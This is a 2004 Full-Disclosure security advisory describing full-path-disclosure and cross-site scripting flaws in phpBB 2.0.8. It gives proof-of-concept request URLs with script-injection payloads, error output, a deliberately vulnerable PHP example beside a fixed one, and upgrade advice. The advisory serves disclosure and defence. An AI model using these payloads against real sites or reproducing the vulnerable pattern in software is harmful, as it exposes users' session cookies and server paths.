[Full-Disclosure] [waraxe-2004-SA#034 - XSS and path full path disclosure in PhpBB 2.0.8]

From: Janek Vind (come2waraxe_at_yahoo.com)
Date: 07/16/04

    To: full-disclosure@lists.netsys.com
    Date: Fri, 16 Jul 2004 07:20:19 -0700 (PDT)
    
    

    {================================================================================}
    { [waraxe-2004-SA#034]                                                           }
    {================================================================================}
    {                                                                                }
    { [ XSS and full path disclosure in PhpBB 2.0.8 ]                                }
    {                                                                                }
    {================================================================================}

    Author: Janek Vind "waraxe"
    Date: 16. July 2004
    Location: Estonia, Tartu
    Web: http://www.waraxe.us/index.php?modname=sa&id=34

    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    phpBB is widely used and very popular forum software,
    written in PHP.

    Homepage: http://www.phpbb.com/

    Vulnerabilities:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    There are several uninitialized arrays in the phpBB code,
    which can lead to XSS and full path disclosure.
    "register_globals" must be enabled on the server for these
    bugs to be exploitable, because only then can a request
    parameter pre-populate a PHP variable before the script
    assigns to it.

    A - Full Path Disclosure
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    A1 - full path disclosure in "index.php":

    http://localhost/phpbb208/index.php?category_rows=waraxe

    Fatal error: [] operator not supported for strings in
    D:\apache_wwwroot\phpbb208\index.php on line 120

    A2 - full path disclosure in
    "language\lang_english\lang_faq.php":

    http://localhost/phpbb208/faq.php?faq=waraxe

    Fatal error: [] operator not supported for strings in
    D:\apache_wwwroot\phpbb208\language\lang_english\lang_faq.php
    on line 41

    A3 - full path disclosure in
    "language\lang_english\lang_bbcode.php":

    http://localhost/phpbb208/faq.php?mode=bbcode&faq=waraxe

    Fatal error: [] operator not supported for strings in
    D:\apache_wwwroot\phpbb208\language\lang_english\lang_bbcode.php
    on line 46

    A4 - full path disclosure in
    "includes\usercp_viewprofile.php":

    http://localhost/phpbb208/profile.php?mode=viewprofile&u=2&ranksrow=waraxe

    Fatal error: [] operator not supported for strings in
    D:\apache_wwwroot\phpbb208\includes\usercp_viewprofile.php
    on line 46

    B - Cross-site scripting aka XSS
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    B1 - XSS in "index.php":

    http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe<script>alert(document.cookie);</script>&category_rows[0][cat_order]=99

    B2 - XSS in "language\lang_english\lang_faq.php":

    http://localhost/phpbb208/faq.php?faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe

    B3 - XSS in "language\lang_english\lang_bbcode.php":

    http://localhost/phpbb208/faq.php?mode=bbcode&faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe
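    The following is an added illustration, not phpBB's own code, of the
    pattern behind findings A1 and B1: a result array that is never
    initialised before the first `[]` append. With register_globals on, a
    request parameter of the same name arrives as a string (fatal error
    and path disclosure) or as a pre-seeded array (unescaped output). The
    row data and titles below are constructed.

    ```php
    <?php
    // Constructed stand-in for the category rows index.php reads from the database.
    $db_rows = array(
        array('cat_id' => 1, 'cat_title' => 'General', 'cat_order' => 10),
    );

    // Vulnerable shape: $category_rows is taken over from the request scope
    // (register_globals=On) and never reset, so whatever the client sent is used.
    function render_vulnerable($category_rows, array $db_rows)
    {
        foreach ($db_rows as $row) {
            // If $category_rows arrived as a string (?category_rows=waraxe),
            // this line dies with "[] operator not supported for strings" and
            // display_errors prints the script's absolute path (finding A1).
            $category_rows[] = $row;
        }
        $html = '';
        foreach ($category_rows as $cat) {
            // Titles are echoed unescaped, so a client-seeded entry with
            // cat_title=<script>...</script> reaches the page verbatim (finding B1).
            $html .= '<b>' . $cat['cat_title'] . '</b>';
        }
        return $html;
    }

    // Hardened shape: a local, explicit initialisation discards anything injected
    // through register_globals, and every title is HTML-escaped on output.
    function render_fixed(array $db_rows)
    {
        $category_rows = array();
        foreach ($db_rows as $row) {
            $category_rows[] = $row;
        }
        $html = '';
        foreach ($category_rows as $cat) {
            $html .= '<b>' . htmlspecialchars($cat['cat_title'], ENT_QUOTES) . '</b>';
        }
        return $html;
    }

    // Simulated register_globals input: a pre-seeded array entry under the client's control.
    $injected = array(array('cat_id' => 1, 'cat_title' => '<script>x</script>', 'cat_order' => 99));

    echo render_vulnerable($injected, $db_rows), "\n"; // injected entry printed as live markup
    echo render_fixed($db_rows), "\n";                 // only database rows, with markup escaped
    ```

    Initialising the array is the code fix; on the server side, turning
    register_globals off removes the injection vector entirely and turning
    display_errors off keeps a remaining fatal error from revealing paths.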

    How to fix:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Affected versions are 2.0.8 and probably older 2.x
    versions too.
    The vendor has released a new version - 2.0.9 - which is
    patched against the discussed bugs and contains many
    other improvements.

    phpBB 2.0.9 packages can be downloaded at:

    http://www.phpbb.com/downloads.php

    Additional information and discussion at waraxe forum:

    http://www.waraxe.us/forums.html

    Greetings:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to Raido Kerna and to
    http://www.gamecheaters.us staff!
    Special greets to icenix and slimjim100!
    Tervitused - Heintz ja Maku!

    Contact:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        come2waraxe@yahoo.com
        Janek Vind "waraxe"

        Homepage: http://www.waraxe.us/

    ---------------------------------- [ EOF ] ------------------------------------


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
